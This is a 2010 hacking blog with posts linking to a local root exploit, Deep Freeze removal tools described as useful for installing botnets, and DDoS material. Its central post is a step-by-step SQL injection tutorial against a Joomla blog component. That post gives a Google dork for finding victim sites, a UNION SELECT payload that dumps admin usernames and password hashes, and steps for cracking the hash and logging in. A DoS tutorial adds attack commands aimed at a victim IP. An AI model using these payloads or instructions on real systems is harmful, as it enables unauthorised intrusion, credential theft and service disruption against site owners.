Last post on this site

Posted on the May 17th, 2010 under Uncategorized by m0riiii

Hello to all friends :-)

After this post, do not posts in this section :-)

but , In this site you can see my 3D works : http://m0riiii.ir/3d/

I hope you continue to support me with Your comment

Successful and victorious

bYe :-(

GoodBye

Posted on the March 26th, 2010 under Uncategorized by m0riiii

Goodbye Hacking World , I Wanna Go To

The Animation World !

2.6.18-20 2009 Local Root Exploit

Posted on the March 13th, 2010 under Local root by m0riiii

# Title: 2.6.18-20 2009 Local Root Exploit
# Author: DigitALL
# Published: 2009-12-23

For Download Exploit Click to Read More

Web Archiving

Posted on the March 8th, 2010 under Links attractive by m0riiii

Archive-It allows institutions to build and preserve their own web archive of born digital content, through a user friendly web application, without requiring any technical expertise or hosting facilities. Subscribers can harvest, catalog, and archive their collections, and then search and browse the collections when complete. Collections are hosted at the Internet Archive data center, and accessible to the public with full text search.

Archive-It is designed to fit the needs of many types of organizations and individuals. The over 125 partners include: state archives, university libraries, federal institutions, state libraries, non government non profits, museums, historians, and independent researchers.

The 950 Collections captured by Archive-It range from subject matters as diverse as “Political parties in Latin America” to the “Matthew Shepard Web Archive” to the “2008 Beijing Olympic Games” to “Iranian Blogs” to “North Carolina State Government Web Site Archive”.

About the Wayback Machine

Browse through over 150 billion web pages archived from 1996 to a few months ago. To start surfing the Wayback, type in the web address of a site or page where you would like to start, and press enter. Then select from the archived dates available. The resulting pages point to other archived pages at as close a date as possible. Keyword searching is not currently supported.

LINK : http://web.archive.org/

TakFanar Deep Freeze Password Remover

Posted on the February 27th, 2010 under tools by m0riiii

Download

Thanks My friend : Amir ( takfanar ) :-)

Anti Deep Freeze v0.2

Posted on the February 26th, 2010 under tools by m0riiii

The latest version of the Arabic written in Delphi, can UndeepFreeze almost every version of DeepFreeze, you do like UndeepFreeze to install botnet, researchers may try something.

AntiDeepFreeze

Link download : http://www.mediafire.com/?ozywnu3undt

How to DDoS – Tutorial.

Posted on the February 26th, 2010 under Tutorials by m0riiii

Came across this Blog tutorial on how to do DDoS attack using 1000s of botnets herded together to attack a computer system. This tutorial, etc. has a lot of valid information. Worth reading it if you want to know how to ddos attack (educational purposes/reading only).

Good site to download latest movies, games, songs

Posted on the February 25th, 2010 under Links attractive by m0riiii

Hi :-)
I Hope will be useful :-)

Good Site To Download Latest Movies, Games, Songs :

ftp://88.87.7.92/

SQL Injections tutorial

Posted on the February 24th, 2010 under Tutorials by m0riiii

Im going to cover some simple SQL Injections. Which we are gonna go through Joomla :)

Alright first you are going to need to go to this link right here:
http://milw0rm.com/exploits/5730. And a Script will come up of what to use. Now you need to
google this : inurl:com_idoblog

Find a website you wish to Inject.

Now once you have done that.. you will need to copy this :
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT
user(),user(),user(),user(),user(),concat(username,0×3a,password)
,user(),user()
.

Now when you find a website it should look like this
Code:
www.target.com/index.php?
You will need to Erase the /INDEX.PHP?[/CODE] and put in
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT
user(),user(),user(),user(),user(),concat(username,0×3a,password)
,user(),user()
now press enter.

If the site is vulnerable you will need the name ” ADMIN ” and then a hash after that.

Go to google, and search ” HASH CALCULATOR ” get the MD5 hash and then you google ” MD5
CRACKER ” and then you just simply fill in what you should do, if the hash is crackable you
will get a password.

Go back to the site you are injecting and type in ADMIN as the username and put the password
you got from the hash as the PASSWORD.

Well done you have successfully finished your first SQL Injection :) .

soruce : www.hackinglibrary.ws

DoS Attack tutorial

Posted on the February 24th, 2010 under Tutorials by m0riiii

Lets get started Denial of Service or (DoS) attacks have matured from mere annoyances to
severe high-profile attacks to e-commerce sites. When performing DoS attacks there are alot of
approached techniques, including the famous but old “Ping of Death” which will be covered in
this tutorial. DoS has been raging on since the 90’s, getting more advanced and more serious.
This tutorial is going to explain the jist of it to you.

We will start at the beginning and I will start by saying that if you plan to bring down a
site with DoS its probably going to take more than 1 computer. The rage which has hit with DoS
is DDoS (distributed denial of service) which is a DoS attack, but not done by one user, done
by many users or a bot armie. A famous DDoS attack is the one done to GNR.com the attack
completely took up all the sites bandwith within seconds. There site was recorded to have been
attack by 456 Windows users.Now that you understand the god like power of this raging and more
feared attack. Lets move on to the different types of DoS attacks.

—Fragmentation overlap

By forcing the OS to deal with overlapping TCP/IP packet fragments, this attack caused many
OSs to suffer crashes and resource starvation. Exploit code was realeased with names such as
bong,boink, and teardrop.

—Oversized Packets

This is called the “Ping of Death” (ping -1 65510 192.168.2.3) an a Windows system (where
192.168.2.3 is the IP adress of the intended victim). What is happening is the attacker is
pinging every port on the victims computer causing it to echo back 65510 requests. Another
example is a jolt attack a simple C program for OSs whose ping commands wont generate
oversized packets. The main goals of the “Ping of Death” is to generate a packet size that
exceeds 65,535 bytes. Which can abrubtly cause the victim computer to crash. This technique
is old!

—Nukers

Yet another old form of attack this is related to a Windows vunlnerablity of some years ago
that sent out-of-band(OOB) packets. To the consenting computer causing it to crash.

—SYN floods

A newer technique of DoS is SYN floods, basically this is done through a 3 step process
better known as the three way handshake. When a TCP connection is initiated this occurs.
Under some normal circumstances, a SYN packet is sent from a specific port on system 1 to
a specific port on system 2 that is in the LISTEN state. Then the potential connection on
system 2 is in a SYN_RECV state. At this stage system 2 will attempt to send back a SYN/ACK
packet to system 1.If all works out, system 1 will send back an ACK packet, and the connection
will move to an ESTABLISHED state. Now thats what happens most of the time, but a SYN flood is
different it creates a half open connection. Most systems can sustain hundreds of connections
on a specific port, but it will only take a few half open connections to exhaust all the
resources on the computer.

—Smurf Attacks

The smurf attack was one of the first to demonstrate the use of unwitting DoS amplifiers on
the Internet. A smurf takes advantage of directed broadcasts and requires a minimum of three
actors: the attacker, the amplifying network, and the victim. What happens is the attacker
sends out spoofed ICMP ECHO packets to the broadcast address of the amplifying network. The
source address of packets is forged to make it appear as if the victim system has initiated
the request. Then all hell breaks loose!!! Because the ECHO packet was sent to the broadcast
address, all systems on the amplifying network will respond to the victim. Now take a thought
if the attacker sends just a single ICMP packet to an amplifying network which contains 500
systems that will respond to a broadcast ping, the attacker has now succeeded in multiplying
the DoS attack by a magnitude of 500!

—Fraggle Attack

A fraggle attack is the same as a smurf attack, but it uses UDP ports instead.

—DDoS Attack

This is a much harder to block kind of attack, it has been used against big sites such as
E-Trade, Ebay, and countless others. The problem with these attacks there very hard to trace.
Most traces can link back to @Home users! The new DDoS attacks are termed Zombies or Bots.
These bots rely heavily on remote automation techniques borrowed from Internet Relay Chat
(IRC) scripts of the same name. A group of zombies under the control of a single person is
called a zombie network or a bot army. The master of these armys or networks can do full
fledged DDoS attacks or SYN floods. The basic estimate size of zombie networks are from a few
systems to 150,000 systems. Even a few hundred machines could prove very dangerous.

source : www.hackinglibrary.ws